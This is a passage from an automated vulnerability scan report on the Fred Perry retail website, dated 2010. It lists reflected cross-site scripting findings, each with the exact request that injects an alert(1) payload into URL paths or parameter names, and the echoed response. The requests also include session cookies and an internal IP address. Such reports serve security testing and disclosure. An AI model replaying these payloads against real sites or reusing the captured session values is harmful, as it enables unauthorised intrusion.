7.12. https://www.fredperry.com/skin/frontend/default/default/css/print.css

7.13. https://www.fredperry.com/skin/frontend/default/default/css/styles.css

8. Private IP addresses disclosed

8.1. http://www.fredperry.com/js/index.php

8.2. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

8.3. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

8.4. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

8.5. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

8.6. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

8.7. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

8.8. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

8.9. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

8.10. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

8.11. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

8.12. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

8.13. http://www.fredperry.com/skin/frontend/default/default/css/print.css

8.14. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

8.15. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

9. Social security numbers disclosed

9.1. http://www.fredperry.com/aboutus/careers/

9.2. http://www.fredperry.com/aboutus/security/

9.3. http://www.fredperry.com/aboutus/terms/

9.4. http://www.fredperry.com/accessories/

9.5. http://www.fredperry.com/accessories/men/

9.6. http://www.fredperry.com/accessories/women/

9.7. http://www.fredperry.com/arcade/

9.8. http://www.fredperry.com/bags/

9.9. http://www.fredperry.com/bags/men/

9.10. http://www.fredperry.com/bags/women/

9.11. http://www.fredperry.com/checkout/cart/

9.12. http://www.fredperry.com/contacts/

9.13. http://www.fredperry.com/customercare/

9.14. http://www.fredperry.com/customercare/delivery/

9.15. http://www.fredperry.com/customercare/deliverylate/

9.16. http://www.fredperry.com/customercare/faq/

9.17. http://www.fredperry.com/customercare/information/

9.18. http://www.fredperry.com/customercare/ordertracking/

9.19. http://www.fredperry.com/customercare/returns/

9.20. http://www.fredperry.com/footwear/

9.21. http://www.fredperry.com/footwear/men/

9.22. http://www.fredperry.com/footwear/women/

9.23. http://www.fredperry.com/heritage/

9.24. http://www.fredperry.com/home/

9.25. http://www.fredperry.com/js/index.php

9.26. http://www.fredperry.com/kids/kidswear/

9.27. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

9.28. http://www.fredperry.com/limited-edition/

9.29. http://www.fredperry.com/limited-edition/men/

9.30. http://www.fredperry.com/limited-edition/men/accessories/

9.31. http://www.fredperry.com/limited-edition/men/bags/

9.32. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

9.33. http://www.fredperry.com/limited-edition/men/british-collectables/

9.34. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

9.35. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

9.36. http://www.fredperry.com/limited-edition/men/footwear/

9.37. http://www.fredperry.com/limited-edition/men/jackets/

9.38. http://www.fredperry.com/limited-edition/men/knitwear/

9.39. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

9.40. http://www.fredperry.com/limited-edition/men/new-styles/

9.41. http://www.fredperry.com/limited-edition/men/shirts/

9.42. http://www.fredperry.com/limited-edition/men/shorts/

9.43. http://www.fredperry.com/limited-edition/men/trousers/

9.44. http://www.fredperry.com/limited-edition/men/woven-shirts/

9.45. http://www.fredperry.com/limited-edition/women/

9.46. http://www.fredperry.com/limited-edition/women/accessories/

9.47. http://www.fredperry.com/limited-edition/women/bags/

9.48. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

9.49. http://www.fredperry.com/limited-edition/women/collaboration/

9.50. http://www.fredperry.com/limited-edition/women/dresses/

9.51. http://www.fredperry.com/limited-edition/women/footwear/

9.52. http://www.fredperry.com/limited-edition/women/jackets/

9.53. http://www.fredperry.com/limited-edition/women/jessica-ogden/

9.54. http://www.fredperry.com/limited-edition/women/knitwear/

9.55. http://www.fredperry.com/limited-edition/women/new-styles/

9.56. http://www.fredperry.com/limited-edition/women/shirts/

9.57. http://www.fredperry.com/limited-edition/women/shorts/

9.58. http://www.fredperry.com/limited-edition/women/skirts/

9.59. http://www.fredperry.com/limited-edition/women/trousers/

9.60. http://www.fredperry.com/limited-edition/women/woven-shirts/

9.61. http://www.fredperry.com/men/

9.62. http://www.fredperry.com/men/jackets/

9.63. http://www.fredperry.com/men/knitwear/

9.64. http://www.fredperry.com/men/shirts/

9.65. http://www.fredperry.com/men/t-shirts/

9.66. http://www.fredperry.com/men/tennis/

9.67. http://www.fredperry.com/men/track-jackets/

9.68. http://www.fredperry.com/men/trousers/

9.69. http://www.fredperry.com/men/woven-shirts/

9.70. http://www.fredperry.com/productinfo/clothingsizes/

9.71. http://www.fredperry.com/productinfo/footwearsizes/

9.72. http://www.fredperry.com/productinfo/garmentcare/

9.73. http://www.fredperry.com/sale/

9.74. http://www.fredperry.com/shops/

9.75. http://www.fredperry.com/site-map/

9.76. http://www.fredperry.com/women/

9.77. http://www.fredperry.com/women/amy-winehouse-landing/

9.78. http://www.fredperry.com/women/amy-winehouse/

9.79. http://www.fredperry.com/women/dresses/

9.80. http://www.fredperry.com/women/jackets/

9.81. http://www.fredperry.com/women/knitwear/

9.82. http://www.fredperry.com/women/shirts/

9.83. http://www.fredperry.com/women/skirts/

9.84. http://www.fredperry.com/women/t-shirts/

9.85. http://www.fredperry.com/women/tennis/

9.86. http://www.fredperry.com/women/trousers/

9.87. http://www.fredperry.com/women/woven-shirts/

9.88. https://www.fredperry.com/customer/account/login/

9.89. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

9.90. https://www.fredperry.com/js/index.php

10. Cacheable HTTPS response

11. HTML does not specify charset

12. Content type incorrectly stated

12.1. http://www.fredperry.com/catalogsearch/ajax/suggest/

12.2. http://www.fredperry.com/js/index.php

12.3. http://www.fredperry.com/skin/frontend/default/default/favicon.ico

12.4. https://www.fredperry.com/skin/frontend/default/default/favicon.ico

13. SSL certificate



1. Cross-site scripting (reflected)  next
There are 291 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a260"-alert(1)-"b04c9bfebf1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus1a260"-alert(1)-"b04c9bfebf1/careers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6lgtsf14sq6tgh58hvj7o36lt3; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus1a260"-alert(1)-"b04c9bfebf1/careers/");
//]]>
...[SNIP]...

1.2. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2112"-alert(1)-"7af98893783 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/careerse2112"-alert(1)-"7af98893783/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6cb751jfeultlo2nf47np4ppg5; expires=Tue, 09-Nov-2010 17:20:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/careerse2112"-alert(1)-"7af98893783/");
//]]>
...[SNIP]...

1.3. http://www.fredperry.com/aboutus/careers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ced5c"-alert(1)-"791ad1593cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/careers/?ced5c"-alert(1)-"791ad1593cd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=iqubl3ro9c6o2rpcraltep9280; expires=Tue, 09-Nov-2010 17:19:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Careers
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/careers/?ced5c"-alert(1)-"791ad1593cd=1");
//]]>
...[SNIP]...

1.4. http://www.fredperry.com/aboutus/security/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c3b6"-alert(1)-"920d2168f26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus6c3b6"-alert(1)-"920d2168f26/security/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=grqcphacqsbo1480b6jtpofki7; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus6c3b6"-alert(1)-"920d2168f26/security/");
//]]>
...[SNIP]...

1.5. http://www.fredperry.com/aboutus/security/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4522d"-alert(1)-"c1b9f21713f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/security4522d"-alert(1)-"c1b9f21713f/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=02tsp3nrifb4436vg02ro7s4l0; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/security4522d"-alert(1)-"c1b9f21713f/");
//]]>
...[SNIP]...

1.6. http://www.fredperry.com/aboutus/security/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/security/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e49"-alert(1)-"987bc5a30f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/security/?37e49"-alert(1)-"987bc5a30f4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3dnjr2him06dao06n4pjatqll0; expires=Tue, 09-Nov-2010 17:19:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Securit
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/security/?37e49"-alert(1)-"987bc5a30f4=1");
//]]>
...[SNIP]...

1.7. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bae7"-alert(1)-"fc574894142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus6bae7"-alert(1)-"fc574894142/terms/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9r493rjv2rujrhmdkb6it0kgu1; expires=Tue, 09-Nov-2010 17:20:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus6bae7"-alert(1)-"fc574894142/terms/");
//]]>
...[SNIP]...

1.8. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c69"-alert(1)-"63f5ec0be34 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/termsa7c69"-alert(1)-"63f5ec0be34/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v21cj99monqcosil98b2hq65s5; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/termsa7c69"-alert(1)-"63f5ec0be34/");
//]]>
...[SNIP]...

1.9. http://www.fredperry.com/aboutus/terms/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/terms/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4969"-alert(1)-"37e10aae9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutus/terms/?e4969"-alert(1)-"37e10aae9f7=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i5c8ei9du2c74tcqn89ncrql67; expires=Tue, 09-Nov-2010 17:19:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Terms &
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/aboutus/terms/?e4969"-alert(1)-"37e10aae9f7=1");
//]]>
...[SNIP]...

1.10. http://www.fredperry.com/accessories/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3885"-alert(1)-"9526fa7e2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accessoriesb3885"-alert(1)-"9526fa7e2c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k2rp2ik1110pdvlrndo6p1vf63; expires=Tue, 09-Nov-2010 17:05:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/accessoriesb3885"-alert(1)-"9526fa7e2c/");
//]]>
...[SNIP]...

1.11. http://www.fredperry.com/accessories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

